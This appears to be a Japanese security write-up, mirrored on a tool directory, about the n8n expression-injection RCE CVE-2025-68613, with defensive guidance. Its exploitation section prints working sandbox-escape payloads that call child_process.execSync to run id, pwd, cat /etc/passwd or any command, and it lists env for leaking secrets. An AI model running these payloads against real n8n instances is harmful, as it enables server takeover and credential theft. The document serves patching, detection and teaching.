Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) 重大なRCE分析 + 防御推奨事項(パッチ検証、検出アイデア、強化のヒント) | Kitploit
ツール/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育インシデントレスポンス
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) 重大なRCE分析 + 防御推奨事項(パッチ検証、検出アイデア、強化のヒント)

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
17ヶ月前未レビュー

ヘッダーバナー

タイピングSVG

深刻度 CVSS インスタンス数 ステータス CWE

ハッカーGIF マトリックスGIF


区切り

📑 目次

  • 🎯 エグゼクティブサマリー
  • 🐛 脆弱性の詳細
  • 🔬 技術分析
  • 💀 悪用手順
  • 💥 影響評価
  • 🔍 検出と対応
  • 🛡️ 緩和策
  • 📚 参考文献

🎯 エグゼクティブサマリー

アラートGIF

CVE-2025-68613 は、n8n のワークフロー自動化プラットフォームにおける 重大なリモートコード実行(RCE)脆弱性 であり、認証済みの攻撃者が 式インジェクション を通じて任意のシステムコマンドを実行できるようにします。


🐛 脆弱性の詳細

バグGIF

📋 CVE 概要

🤖 n8n とは?

n8n はオープンソースのワークフロー自動化プラットフォームで、400 以上のアプリケーションとの ノーコード/ローコード統合 を可能にします。以下のような環境で広く展開されています:

🏢 ユースケース📝 説明
🔧 DevOps

🔧 技術的根本原因

root@kitploit:~
🔓 脆弱性チェーン:
┌─────────────────────────────────────────────────────────────────┐
│  📝 n8n 式言語 → 動的データ処理                                 │
│                           ↓                                     │
│  ⚠️  サンドボックス分離の不十分なサーバーサイド評価              │
│                           ↓                                     │
│  💀 悪意のある式がサンドボックスを脱出                          │
│                           ↓                                     │
│  🖥️  Node.js child_process モジュールにアクセス                 │
│                           ↓                                     │
│  💥 完全な RCE - OS コマンド実行                                │
└─────────────────────────────────────────────────────────────────┘

🔬 技術分析

分析GIF

🎯 攻撃面

悪用の前提条件:

#📋 要件📝 詳細
1️⃣認証有効な n8n ユーザーアカウント(低権限で十分)
2️⃣権限

⚔️ 攻撃の特徴

🏷️ 属性📊 値🔥 リスク
複雑さ低 (AC:L)🔴 高
ユーザー操作不要🔴 高

🗺️ 脆弱性フロー図

root@kitploit:~
graph TD
    A[🔐 認証ユーザー] -->|作成| B[📝 新規ワークフロー]
    B -->|注入| C[💀 悪意のある式]
    C -->|トリガー| D[⚡ 式評価]
    D -->|悪用| E[🔓 サンドボックス脱出]
    E -->|アクセス| F[🖥️ Node.js ランタイム]
    F -->|実行| G[💥 child_process によるOSコマンド]
    G -->|達成| H[☠️ サーバー完全乗っ取り]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 悪用手順

ハッキングGIF

⚠️ 免責事項:以下は 教育目的のみ です。不正な悪用は違法です。

📸 段階的な悪用スクリーンショット

🖥️ ステップ 1:n8n インスタンスへのアクセス

脆弱な n8n ワークフロー自動化プラットフォームへの初期アクセス。

n8n ウェルカム画面
🔓 n8n ウェルカムダッシュボード - エントリポイント


➕ ステップ 2:新規ワークフローの作成

悪意のあるペイロードを含む新しいワークフローを作成します。

新規ワークフロー作成
📝 「最初のステップを追加」で新規ワークフローを作成


⚡ ステップ 3:マニュアルトリガーの追加

ワークフロートリガーを設定 - マニュアルトリガーはオンデマンド実行を可能にします。

マニュアルトリガー設定
🎯 ワークフロー起動のためのマニュアルトリガーを選択


📦 ステップ 4:Set ノードの追加

悪意のある式を含む「項目を編集(Set)」ノードを追加します。

Set ノード選択
🔧 ペイロード注入用の「項目を編集(Set)」ノードを追加


💉 ステップ 5:RCE ペイロードの注入

重要なステップ - サンドボックス脱出式を注入して RCE を達成します。

RCE ペイロード実行
💀 悪意のある式が 'id' コマンドを正常に実行!

root@kitploit:~
// 🔴 悪意のあるペイロード(不正利用厳禁)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

出力結果: uid=1000(node) gid=1000(node) groups=1000(node) ✅ RCE 確認!


💉 ペイロード例

コードインジェクションGIF

⚠️ 警告:これらのペイロードは 認可されたセキュリティテストのみ を目的としています。不正利用は違法です!

🔹 ID コマンド(ユーザー情報)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

🔹 PWD コマンド(現在のディレクトリ)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

🔹 ファイル読み取り(/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}

🔹 カスタムコマンドテンプレート

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('あなたのコマンド').toString() })() }}

📸 ファイル読み取り悪用 PoC

passwd ファイル読み取り悪用
💀 /etc/passwd の読み取り - 完全なファイルシステムアクセスを実証!


📤 期待される出力


🔍 根本原因分析

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 脆弱性の根本原因                                                     │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  n8n の式評価器は、関数式が以下のものにアクセスするのを防ぐサニタイザーが  │
│  欠如しています:                                                       │
│                                                                         │
│    ❌ this.process        → Node.js プロセスオブジェクト                │
│    ❌ mainModule.require  → モジュールローディングシステム              │
│    ❌ child_process       → OS コマンド実行                             │
│                                                                         │
│  これにより、システムモジュールへの直接アクセスと任意コード実行が可能!  │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 影響サマリー

✅ 緩和策

アップグレード

root@kitploit:~
# 🛡️ n8n を修正バージョンにアップグレード
npm install -g n8n@latest

# Docker を使用する場合
docker pull n8n/n8n:1.122.0

🎬 攻撃キルチェーン

☠️ 事後悪用機能


💥 影響評価

爆発GIF

🔺 CIA トライアド分析

🌍 実際の露出状況

脆弱なインスタンス


🔍 検出と対応

探偵GIF

🔎 検出戦略

🛠️ バージョン監査スクリプト

root@kitploit:~
#!/usr/bin/env bash
# 🔍 CVE-2025-68613 n8n バージョン監査

echo "🔍 n8n バージョンを確認中..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  脆弱: n8n $VER は CVE-2025-68613 の影響を受けます"
        echo "📦 対応: バージョン 1.120.4, 1.121.1, または 1.122.0+ にアップグレードしてください"
        exit 2
    else
        echo "✅ 安全: n8n $VER は修正されています"
    fi
else
    echo "❌ n8n が PATH に見つかりません"
fi

🚨 インシデント対応チェックリスト

  • 🔌 隔離 - 影響を受けた n8n をネットワークから切断
  • 💾 保存 - ログとフォレンジックアーティファクトをキャプチャ
  • 🔍 監査 - すべてのワークフローに悪意のある式がないか確認
  • 🔄 ローテーション - アクセス可能なすべての認証情報を変更
  • 🔀 レビュー - 横方向移動の兆候を確認
  • 📦 パッチ適用 - 復旧前に安全なバージョンにアップグレード

🛡️ 緩和策

シールドGIF

⚡ 即時対応(優先度 0)

🐳 コンテナ強化例

root@kitploit:~
# 🛡️ 強化された n8n デプロイメント
FROM n8n/n8n:1.122.0

# 👤 非 root ユーザーで実行
USER node

# 🔒 以下のランタイムフラグを適用:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 長期的なセキュリティ対策

🛡️ 対策📝 実装方法
🌐 ネットワークセグメンテーションn8n インスタンスを分離
🔥 WAF ルール式パターンを監視
📜 監査ログ包括的なログを有効化
🔍 セキュリティレビュー定期的なワークフロー評価

💬 ブルーチームへの質問 🔵

思考GIF

n8n ワークフロー定義において、正当な動的式の使用とセキュリティのバランスを考慮しながら、実行前に式インジェクションの試みを検出するルールをどのように設計しますか?

追加課題: パッチ適用後もサンドボックス脱出が発生した場合に、ブラスト半径を制限するためにどのようなランタイム保護を実装しますか?


📚 参考文献

書籍GIF

📋 公式アドバイザリ

  • 🔗 NVD CVE-2025-68613 詳細
  • 🔗 Snyk アドバイザリ

🔬 技術分析

  • 📖 Orca Security: Critical n8n RCE
  • 📖 Resecurity: 式インジェクション深掘り
  • 📖 SecureLayer7: RCE 悪用ガイド

🎮 実践リソース

  • 🧪 TryHackMe: CVE-2025-68613 ラボ
  • 💀 公開 PoC スキャナー

🏷️ タグ

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #式インジェクション #ワークフロー自動化 
#サンドボックス脱出 #CWE-913 #重大な脆弱性 #ペネトレーションテスト #ブルーチーム

フッター

⚠️ 免責事項: この分析は 教育および防御目的 のみです。
脆弱性の不正な悪用は 違法 です。

作者 更新日

プロフィール閲覧数

ツールをダウンロード

⚡ クイックスタッツ

🔥 指標📊 値
CVSS スコア9.9 / 10
露出インスタンス数103,476+
攻撃の複雑さ低
認証要件あり(低権限)
ユーザー操作不要

🎯 重要事項

📌 プロパティ📝 値
公開日2025年12月18日
ベクトルネットワーク (AV:N)
スコープ変更あり
影響CIA = 高
エクスプロイトタイプ式インジェクション
プロパティ値
🆔 CVE IDCVE-2025-68613
📊 CVSS スコア9.9(重大)🔴
🔗 CVSS ベクトルCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913(動的に管理されるコードリソースの不適切な制御)
📦 影響を受けるバージョン0.211.0 → 1.120.3, 1.121.0
✅ 修正バージョン1.120.4, 1.121.1, 1.122.0+
自動化パイプライン、CI/CD 統合
🛡️ セキュリティ運用SOAR ワークフロー、インシデント対応
💼 ビジネスプロセス自動化、データワークフロー
📊 データETL プロセス、API 統合
ワークフローの作成/編集機能
3️⃣ネットワークアクセスn8n インスタンスに到達可能であること
スコープ
変更あり
🔴 重大
🎯 ペイロード📋 期待される出力
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwdシステムユーザー一覧(root, daemon, node など)
envシークレットを含むすべての環境変数
ls -la /ルートファイルシステムの一覧
🎯 影響タイプ📝 説明
💻 任意コマンド実行任意の OS コマンドを実行
📂 ファイルシステムアクセス任意のファイルを読み取り/書き込み
🔑 環境変数の露出API キー、シークレットが漏洩
☠️ システム完全乗っ取りサーバーの完全掌握
🛡️ 深刻度📊 評価
CVSS スコア9.9 / 10
攻撃の複雑さ低
必要な権限低
ユーザー操作不要
フェーズ🔥 アクション💀 影響
1️⃣初期アクセスn8n に認証
2️⃣実行悪意のあるワークフローを送信
3️⃣永続化リバースシェル/バックドアを展開
4️⃣C2コマンド&コントロールを確立
5️⃣アクションデータ流出、横方向移動
🎯 アクション💥 影響レベル
🔑 認証情報の窃取API キー、OAuth トークン、DB パスワードを抽出
📤 データ流出ワークフローデータ、実行ログ、ビジネス情報
🔒 永続化cron ジョブ、スタートアップスクリプト、ウェブシェル
🔀 横方向移動データベース、CI/CD、クラウドインフラへのピボット
🗑️ ワークフロー操作自動化ロジックの変更/破壊

🔴 機密性(高)

  • 🔑 API キーの露出
  • 🔐 OAuth トークンの漏洩
  • 💾 DB パスワードがアクセス可能
  • 📜 実行ログの漏洩

🟠 完全性(高)

  • 📝 ワークフローの改ざん
  • ⚙️ 自動化の破壊
  • 💉 悪意のあるノードの注入
  • 📊 データの操作

🟡 可用性(高)

  • ⏹️ サービスの妨害
  • 💀 リソースの枯渇
  • 🔄 ワークフローの終了
  • 🖥️ インフラストラクチャのダウン
#📋 方法🔍 監視すべき項目
📜ログ分析n8n プロセスからの異常なコマンド、失敗した式
🌐ネットワーク未知の IP への送信接続、大量の POST リクエスト
⚡ランタイムchild_process の呼び出し、予期しないプロセス生成
📦バージョン監査脆弱性のあるバージョン範囲との照合
🔢 優先度🛠️ アクション📝 詳細
🔴 P0今すぐパッチ適用バージョン 1.120.4, 1.121.1, または 1.122.0+ にアップグレード
🟠 P1アクセス制限ワークフロー作成を信頼できるユーザーのみに制限
🟡 P2コンテナ強化セキュリティ制限を設けてデプロイ
🔓 最小権限アクセス制御を強化